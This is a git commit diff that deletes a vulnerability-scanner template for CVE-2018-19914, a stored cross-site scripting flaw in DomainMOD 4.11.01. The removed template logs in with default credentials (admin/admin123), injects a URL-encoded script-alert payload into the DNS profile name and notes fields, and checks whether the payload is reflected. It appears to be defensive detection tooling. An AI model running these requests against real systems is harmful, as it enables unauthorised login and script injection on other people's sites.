Delete CVE-2018-19914.yaml

patch-1
Prince Chaddha 2022-07-10 11:01:31 +05:30 committed by GitHub
parent 49559b3716
commit 6015a157c7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 61 deletions

View File

@ -1,61 +0,0 @@
id: CVE-2018-19914
info:
name: DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
reference:
- https://www.exploit-db.com/exploits/46375/
- https://github.com/domainmod/domainmod/issues/87 Exploit Third Party Advisory
metadata:
verified: true
tags: wbcecms,xss
requests:
- raw:
- |
POST /domain/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username=admin&new_password=admin123
- |
POST /domain/assets/add/dns.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: https://{{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
- |
GET /domain/assets/dns.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true
matchers-condition: and
redirects: true
max-redirects: 3
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200